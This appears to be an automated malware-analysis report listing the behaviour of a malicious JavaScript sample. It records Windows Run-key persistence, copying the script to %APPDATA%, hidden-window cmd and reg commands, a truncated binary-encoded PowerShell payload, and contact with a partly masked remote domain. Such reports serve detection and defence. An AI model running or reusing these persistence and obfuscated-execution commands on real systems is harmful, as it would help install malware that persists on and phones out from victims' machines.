Technical Information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'lol' = '%APPDATA%\<File name>.js'
- %APPDATA%\<File name>.js
- 'kh###osja.net':80
- DNS ASK google.com
- DNS ASK kh###osja.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010... (with hidden window)
- '<SYSTEM32>\cmd.exe' /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "%APPDATA%\<File name>.js" (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.js" "%APPDATA%\" /Y (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010...
- '<SYSTEM32>\cmd.exe' /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "%APPDATA%\<File name>.js"
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.js" "%APPDATA%\" /Y
- '<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "%APPDATA%\<File name>.js"